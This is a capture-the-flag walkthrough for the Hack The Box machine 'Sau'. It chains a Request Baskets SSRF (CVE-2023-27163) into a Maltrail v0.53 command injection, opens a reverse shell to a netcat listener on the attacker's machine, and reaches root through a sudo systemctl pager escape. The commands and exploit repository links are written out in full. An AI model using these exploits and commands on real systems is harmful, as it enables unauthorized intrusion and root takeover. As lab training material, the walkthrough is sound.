# Sau

## 1. nmap scan

![image](https://hackmd.io/_uploads/H1nFRgDVa.png)

http://10.10.11.224:55555/

Opening the site in a browser shows the "Request Baskets" web app (request-baskets). A Google search for "Request Baskets" turns up CVE-2023-27163, a server-side request forgery: anyone who can create a basket can point its forward URL at a host the server can reach, which includes services bound only to localhost on the target. The public PoC script takes the request-baskets URL and the internal URL to forward to:

```
./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80
```

Opening the newly created basket in the browser now proxies the target's internal port 80, and the page footer reads "Powered by Maltrail (v0.53)". A Google search for "Maltrail (v0.53)" finds an unauthenticated OS command injection in the login form's username parameter, with a ready-made exploit:

```
git clone https://github.com/spookier/Maltrail-v0.53-Exploit
```

![image](https://hackmd.io/_uploads/rymnRlv46.png)

## 2. Reverse shell

The basket's web UI also lets you set the forward URL by hand (the basket settings dialog), so the SSRF can be configured without the script.

![image](https://hackmd.io/_uploads/HyMZ8QDNp.png)

Start a listener on kali:

```
nc -nvlp 9991
```

Then run the Maltrail exploit through the basket; the third argument is the basket URL, which the server forwards to the internal Maltrail instance:

```
python3 exploit.py 10.10.14.47 9991 http://10.10.11.224:55555/oz6dumj
```

![image](https://hackmd.io/_uploads/r1zHU7D4p.png)

The reverse shell connects back (as the user `puma`).

![image](https://hackmd.io/_uploads/SkgMOQDNT.png)

## 3. Privilege escalation

`sudo -l` shows:

```
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
```

![image](https://hackmd.io/_uploads/ryzFd7DE6.png)

`systemctl status` sends its output through a pager (`less` by default) when attached to a terminal, and because sudo runs it as root, the pager runs as root too. At the `less` prompt type `!sh` to spawn a shell from the pager; that shell is root.

Two things must hold for this to work: the reverse shell needs a real TTY (upgrade it first, e.g. `python3 -c 'import pty;pty.spawn("/bin/bash")'`), and the status output has to be longer than one screen, because systemd runs `less` with `LESS=FRSXMK` and the `F` flag makes it exit immediately when everything fits on the first screen. Shrinking the terminal (for example `stty rows 5`) forces the pager to stay open.

![image](https://hackmd.io/_uploads/rJ_OFXwET.png)

From the root shell:

```
cat /root/root.txt        # flag2
cat /home/puma/user.txt   # flag1
```

---------------------------------

Possibly simpler alternatives:

GitHub, Sau htb PoC: https://github.com/SethJGibson/Hummingbird-Maltrail-RCE-PoC

GitHub, Sau RCE hackthebox: https://github.com/M11K33L/SAU-Machine-RCE-hackthebox